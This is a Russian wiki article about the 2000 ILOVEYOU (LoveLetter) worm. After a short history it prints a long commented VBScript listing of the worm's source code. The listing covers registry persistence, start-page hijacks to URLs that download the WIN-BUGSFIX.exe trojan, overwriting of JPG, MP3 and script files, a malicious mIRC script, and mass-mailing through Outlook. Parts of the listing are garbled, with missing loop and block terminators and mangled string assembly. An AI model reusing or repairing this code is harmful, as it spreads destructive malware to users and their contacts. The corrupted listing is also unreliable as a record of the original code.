Вирусы вики

ILOVEYOU, или LoveLetter - компьютерный вирус, который атаковал миллионы компьютеров на ОС Windows в 2000 году.[]

Вирус был разослан на почтовые ящики с Филиппин в ночь с 4 мая по 5 мая 2000 года.

в теме письма содержалась строка «ILoveYou», а к письму был приложен скрипт «LOVE-LETTER-FOR-YOU.TXT.vbs».

Когда пользователь открывал вложение, вирус рассылал копию самого себя всем контактам в адресной книге Microsoft Outlook. Он также перезаписывал файлы определённых типов и распространялся через IRC-каналы, создавая файл LOVE-LETTER-FOR-YOU.HTM в системном каталоге Windows.

Вирус заразил в общей сложности более 3 млн компьютеров по всему миру.

Предполагаемый ущерб от вируса составил до 10 млрд$, за что вошёл в Книгу рекордов Гиннеса, как самый разрушительный компьютерный вирус в мире.

Как работает данный вирус[]

Червь ищет все подключенные диски и заменяет файлы с расширениями JPG, JPEG, VBS, VBE, CSS, WSH, JS, JSE, SCT, DOC, HTA, MP2 и MP3 на копии самого себя. Кроме того, он также добавляет расширение VBS, которое затем делает компьютер пользователя не загружаемым.

Кроме всего этого, вирус загружает троян Barok из исполняемого файла WIN-BUGSFIX.EXE.

Код трояна[]

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
rem Setup global variables to be used throughout subroutines and functions.
Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow
eq = ""
ctr = 0
rem Open the current script file and define "vbscopy" which can be used to
rem read its own contents. Used to replicate itself in other files.
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
vbscopy = file.ReadAll
rem Subroutine to initalize the program
Sub main()
On Error Resume Next
Dim wscr, rr
Set wscr = CreateObject("WScript.Shell")
rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
If (rr >= 1) Then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
End If
rem Finds special folders, such as system, temporary and windows folders.
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
rem Copy itself into VBScript files MSKernel32.vbs, Win32DLL.vbs and
c.Copy(dirsystem & "\MSKernel32.vbs")
c.Copy(dirwin & "\Win32DLL.vbs")
c.Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
End Sub
rem Subroutine to create/update registry values.
Sub regruns()
On Error Resume Next
Dim num, downread
rem Set the system to automatically run MSKernel32.vbs and Win32DLL.vbs on startup.
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", dirsystem & "\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL", dirwin & "\Win32DLL.vbs"
rem Get internet Explorer's download directory.
downread = ""
downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
rem If the directory wasn't found, then use C:\ drive as the download directory.
If (downread = "") Then
downread = "c:\"
End If
rem Check if a file named "WinFAT32.exe" exists in the system files.
If (fileexist(dirsystem & "\WinFAT32.exe") = 1) Then
rem Generate a random number from 1 to 4.
num = Int((4 * Rnd) + 1)
rem Randomly update the Internet Explorer's start page that leads to a
rem page that will download a malicious executable "WIN-BUGSFIX.exe".
If num = 1 Then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
ElseIf num = 2 Then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
ElseIf num = 3 Then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
ElseIf num = 4 Then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
End If
End If
rem Check if the "WIN-BUGSFIX.exe" file exists in the download directory.
If (fileexist(downread & "\WIN-BUGSFIX.exe") = 0) Then
rem Add WIN-BUGSFIX.exe to run on startup
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe"
rem Update Internet Explorer's start page to "about:blank"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage", "about:blank"
End If
End Sub
rem Subroutine to list folders in drives.
Sub listadriv()
On Error Resume Next
Dim d, dc, s
Set dc = fso.Drives
For Each d In dc
If (d.DriveType = 2) Or (d.DriveType = 3) Then
folderlist(d.path & "\")
End If
listadriv = s
End Sub
rem Subroutine infect other files, by copying itself into them as well
rem as creating a malicious mIRC script.
Sub infectfiles(folderspec)
On Error Resume Next
Dim f, f1, fc, ext, ap, mircfname, s, bname, mp3
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
s = lcase(f1.name)
rem Copies itself into every file with vbs/vbe extension.
If (ext = "vbs") Or (ext = "vbe") Then
Set ap = fso.OpenTextFile(f1.path, 2, true)
ap.write vbscopy
rem Copies itself into every file with js/jse/css/wsh/sct/hta extension.
ElseIf (ext = "js")
Or (ext = "jse")
Or (ext = "css")
Or (ext = "wsh")
Or (ext = "sct")
Or (ext = "hta")
Set ap = fso.OpenTextFile(f1.path, 2, true)
ap.write vbscopy
bname = fso.GetBaseName(f1.path)
Set cop = fso.GetFile(f1.path)
cop.copy(folderspec & "\" & bname & ".vbs")
rem Copies itself into every file with jpg/jpeg extension.
ElseIf (ext = "jpg") Or (ext = "jpeg") Then
rem Copies itself
Set ap = fso.OpenTextFile(f1.path, 2, true)
ap.write vbscopy
Set cop = fso.GetFile(f1.path)
cop.copy(f1.path & ".vbs")
rem Copies itself into every file with mp3/mp2 extension.
ElseIf (ext = "mp3") Or (ext = "mp2") Then
Set mp3 = fso.CreateTextFile(f1.path & ".vbs")
mp3.write vbscopy
Set att = fso.GetFile(f1.path)
att.attributes = att.attributes + 2
End If
If (eq <> folderspec) Then
rem Looks for mIRC and related files to determine whether it
rem should create/replace its script.ini with a malicious script.
If (s = "mirc32.exe")
Or (s = "mlink32.exe")
Or (s = "mirc.ini")
Or (s = "script.ini")
Or (s = "mirc.hlp")
Set scriptini = fso.CreateTextFile(folderspec & "\script.ini")
rem The following mIRC script checks if the "nick" of a user is the same
rem as "me" to halt and send a DCC command to send a message to the user
rem with a link to the LOVE=LETTER-FOR-YOU html page on the system.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, If mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /If ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick" & dirsystem & "\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
eq = folderspec
End If
End If
End Sub
rem Subroutine used to get file listing of a folder.
Sub folderlist(folderspec)
On Error Resume Next
Dim f, f1, sf
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
End Sub
rem Subroutine used to create/write registry entries.
Sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey, regvalue
End Sub
rem Subroutine used to get registry entries.
Function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget = regedit.RegRead(value)
End Function
rem Function to check if a file exists.
Function fileexist(filespec)
On Error Resume Next
Dim msg
If (fso.FileExists(filespec)) Then
msg = 0
msg = 1
End If
fileexist = msg
End Function
rem Function to check if a folder exists.
Function folderexist(folderspec)
On Error Resume Next
Dim msg
If (fso.GetFolderExists(folderspec)) Then
msg = 0
msg = 1
End If
fileexist = msg
End Function
rem Subroutine to send emails to the user's contacts (MAPI)
Sub spreadtoemail()
On Error Resume Next
Dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
Set regedit = CreateObject("WScript.Shell")
Set out = WScript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
rem Goes through all contacts in the address book and sends an email
rem with the LOVE-LETTER-FOR-YOU program as an attachment.
For ctrlists = 1 To mapi.AddressLists.Count
Set a = mapi.AddressLists(ctrlists)
x = 1
regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
If (regv = "") Then
regv = 1
End If
If (int(a.AddressEntries.Count) > int(regv)) Then
For ctrentries = 1 To a.AddressEntries.Count
malead = a.AddressEntries(x)
regad = ""
regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead )
If (regad = "") Then
Set male = out.CreateItem(0)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD"
End If
x = x + 1
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count
End If
Set out = Nothing
Set mapi = Nothing
End Sub
rem Subroutine to generate and create the HTML file for LOVE-LETTER-FOR-YOU.HTM.
Sub html
On Error Resume Next
Dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
rem Generates an HTML page which contains JScript and VBScript replicate itself.
rem by leveraging ActiveX. It also listens for mouse and key events, which
rem ends up open more windows of the page.
& vbcrlf & _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"
& vbcrlf & _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"
& vbcrlf & _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "
& vbcrlf & _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"
& vbcrlf & _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"
& vbcrlf & _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>"
& vbcrlf & _ "<?-?BODY><?-?HTML>"
& vbcrlf & _ "<SCRIPT language=@-@JScript@-@>"
& vbcrlf & _ ""
& vbcrlf & _ "<?-?SCRIPT>"
& vbcrlf & _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"
& vbcrlf & _ ""
& vbcrlf & _ "<?-?SCRIPT>"
dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'")
dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """")
dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/")
dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\")
dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'")
dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """")
dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/")
dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set c = fso.OpenTextFile(WScript.ScriptFullName, 1)
lines = Split(c.ReadAll,vbcrlf)
l1 = ubound(lines)
For n = 0 to ubound(lines)
lines(n) = replace(lines(n), "'", chr(91) + chr(45) + chr(91))
lines(n) = replace(lines(n), """", chr(93) + chr(45) + chr(93))
lines(n) = replace(lines(n), "\", chr(37) + chr(45) + chr(37))
If (l1 = n) Then
lines(n) = chr(34) + lines(n) + chr(34)
lines(n) = chr(34) + lines(n) + chr(34) & " & vbcrlf & _"
End If
rem Create the LOVE-LETTER-FOR-YOU.HTM file in the system directory.
Set b = fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM")
Set d = fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM", 2)
d.write dt5
d.write join(lines, vbcrlf)
d.write vbcrlf
d.write dt6
End Sub